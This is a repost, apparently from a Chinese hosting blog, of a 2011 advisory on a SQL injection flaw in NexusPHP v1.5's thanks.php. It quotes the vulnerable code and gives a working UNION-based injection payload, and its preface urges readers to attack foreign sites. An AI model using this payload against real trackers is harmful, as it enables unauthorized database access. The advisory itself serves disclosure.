NexusPHP v1.5 SQL注入漏洞及修复 « p2pnow - 您的软件硬件解决方案专家 hosting,vps,servers

还是老话不变，多搞搞国外的站

别老丢人拿着满是注入点，上传漏洞的站挂黑页

不是显得你牛逼，只是显得你更傻逼

标题: Nexusphp.v1.5 SQL injection Vulnerability

作者: flyh4t www.92hack.net

下载地址: http://sourceforge.net/projects/nexusphp/

影响版本: nexusphp.v1.5

测试平台: linux+apache

Nexusphp is BitTorrent private tracker scripts written in PHP

源码下载：http://sourceforge.net/projects/nexusphp/

thanks.php存在一些sql注射缺陷

———————–代码分析——————-

//thanks.php

if ($_GET['id'])

stderr(“Party is over!”, “This trick doesn’t work anymore. You need to click the button!”);

$userid = $CURUSER["id"];

$torrentid = $_POST["id"];

$tsql = sql_query(“SELECT owner FROM torrents where id=$torrentid”);

$arr = mysql_fetch_array($tsql);

———————–end——————-

$_POST["id"] is not checked, lead a sql injection Vulnerability

———————–测试——————-

_POST[id] : -1 union select version()>4/* www.92hack.net

———————–end ——————-

修复：checked

This entry was posted on 2011年11月30日, 9:51 下午 and is filed under 未分类. You can follow any responses to this entry through RSS 2.0. Responses are currently closed, but you can trackback from your own site.

p2pnow

您的软件硬件解决方案专家 hosting,vps,servers

NexusPHP v1.5 SQL注入漏洞及修复

Comments are closed.

站点导航

最新消息

在线客服